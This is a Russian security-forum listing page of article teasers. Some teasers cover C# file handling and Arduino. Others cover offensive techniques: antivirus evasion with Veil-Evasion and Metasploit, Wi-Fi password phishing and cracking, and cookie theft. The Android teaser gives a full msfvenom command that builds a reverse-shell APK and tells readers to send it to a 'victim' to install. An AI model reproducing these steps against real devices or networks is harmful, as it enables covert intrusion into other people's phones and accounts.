• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Форум информационной безопасности - Codeby.net

Статья Как скопировать файл с помощью языка C#?

  • 14 111
  • 0
Из этой статьи Вы узнаете, как скопировать файл, используя язык c#. Но, для начала хотелось бы сказать, что, не смотря на то, что данная операция на самом деле состоит из нескольких этапов, например, таких как создание нового файла, по байтовое копирование информации, удаление старого файла. В языке csharp нас избавили от всех этих «мелких нюансов», поэтому для того, чтобы скопировать файл 1.txt из папки c:\dir1 в папку с:\dir2, вам всего лишь нужно в своей программе написать буквально одну строчку кода.
C#:
using System.IO; //добавить!
File.Copy(@"C:\dir1\1.txt", @"C:\dir2\2.txt", true);
Для работы мы используем класс File и метод Copy, в который в качестве первого параметра, передаём полный путь к файлу, который необходимо скопировать. Вторым параметров указываем, куда мы копируем файл. Третий, необязательный параметр, который имеет тип bool, позволяет определить действие, которое нужно выполнить, если в папке dir2 уже содержится файл (2.txt). Например...

Статья Обход защиты удаленных систем: Veil-Evasion и Metasploit для продвинутых техник тестирования на проникновение

  • 114 605
  • 352
В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа...

Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

  • 62 020
  • 25
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.
Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4...

Статья Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств

  • 6 929
  • 11
Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств для новичков и профессионалов. Платформа пользуется огромной популярностью во всем мире благодаря удобству и простоте языка программирования, а также открытой архитектуре и программному коду. Устройство программируется через USB без использования программаторов.

Arduino позволяет компьютеру выйти за рамки виртуального мира в физический и взаимодействовать с ним. Устройства на базе Arduino могут получать информацию об окружающей среде посредством различных датчиков, а также могут управлять различными исполнительными устройствами.

Микроконтроллер на плате программируется при помощи языка Arduino (основан на языке Wiring) и среды разработки Arduino (основана на среде Processing). Проекты устройств, основанные на Arduino, могут работать самостоятельно, либо же взаимодействовать с программным обеспечением на компьютере (напр.: Flash, Processing, MaxMSP). Платы могут быть собраны...

Статья Как можно быстро получить все буквы русского или английского алфавита?

  • 14 295
  • 0
Просматривая исходник одной из программ, увидел следующую строку:
C#:
List<char> alphabet = new List<char> {"A","B","C","D","E" и т.д.};

Как видно обычный лист, заполненный значениями, в плане синтаксиса ошибок нет, но есть один минус, все значения были введены вручную. С одной стороны значений не много, всего 26, в принципе можно и ввести, но если, к примеру, понадобиться добавить ещё один такой же лист, который будет содержать все буквы русского алфавита или сразу два списка обоих алфавитов в нижнем регистре, как быть тогда, тоже все руками вводить? Конечно, можно найти и скопировать уже готовый список значений и ничего вводить вручную не придется, но есть ещё один способ, о нём я расскажу в этой статье.

Как получить все буквы английского алфавита
Для начала вспоминаем, что есть такая вещь, как Unicode. Юникод — это стандарт кодирования символов, который позволяет представить знаки практически всех...

Статья Получение любого Wi-Fi пароля без взлома с помощью Wifiphisher

  • 17 855
  • 2
Нужно достать пароль от Wi-Fi, но нет времени на его взлом ? В предыдущих руководствах я показал, как взламывать WEP, WPA2 и WPS, но некоторые читатели жалуются, что на взлом WPA2 уходит слишком много времени, а защита WPS включена далеко не на всех точках доступа (на мой взгляд, точек с WPS всё ещё достаточно много). Чтобы помочь вам в таких ситуациях, я расскажу о практически гарантированном способе получения пароля от Wi-Fi без всякого взлома с помощью Wifiphisher.

Этапы стратегии...

Статья Как украсть Cookies (Wireshark + Parrot)

  • 10 477
  • 3
И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставаться без участия и выложить простой материал по данной теме. Нам с вами известно что программа обладает незаменимым для нас функционалом.

Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите)

Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark .

На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы но все нужное...

Статья Взлом Wi-Fi WPS с Bully: как получить пароль сети (Kali Linux)

  • 34 719
  • 13
Как и во всем, что касается кибербезопасности, существует множество подходов к получению необходимой информации и достижению целей взлома. У опытных хакеров всегда есть в запасе несколько трюков, ведь не существует универсального метода, который работал бы для каждой системы и любой ситуации.

Я уже рассказывал о нескольких способах взлома Wi-Fi, включая взлом паролей WEP и WPA2, а также создание поддельной точки доступа и невидимой точки доступа для незаметного перехвата данных.

Не так давно мы показывали...

Статья Взлом паролей WPA2-PSK с помощью Aircrack-Ng

  • 55 401
  • 24
После разработки Wi-Fi в конце 1990-х годов для обеспечения безопасности беспроводных коммуникаций был создан эквивалент конфиденциальности проводных сетей. WEP оказался крайне несовершенным и легко взламываемым стандартом. Частично тема была затронута в моём руководстве по взлому Wi-Fi для начинающих.

Сейчас большинство беспроводных точек доступа используют защищённый доступ Wi-Fi 2 с предварительным ключом, так же известный как WPA2-PSK. В WPA2 применяется более сильный алгоритм шифрования AES, который очень сложно взломать (но это возможно).

Слабость системы WPA2-PSK заключается в том, что зашифрованный пароль передаётся путём 4-стороннего рукопожатия. Когда клиент совершает вход в точку доступа (AP), начинается процесс его аутентификации, состоящий из 4 этапов. Если мы перехватим пароль в этот момент, то сможем попытаться его взломать.

В данном руководстве, входящем...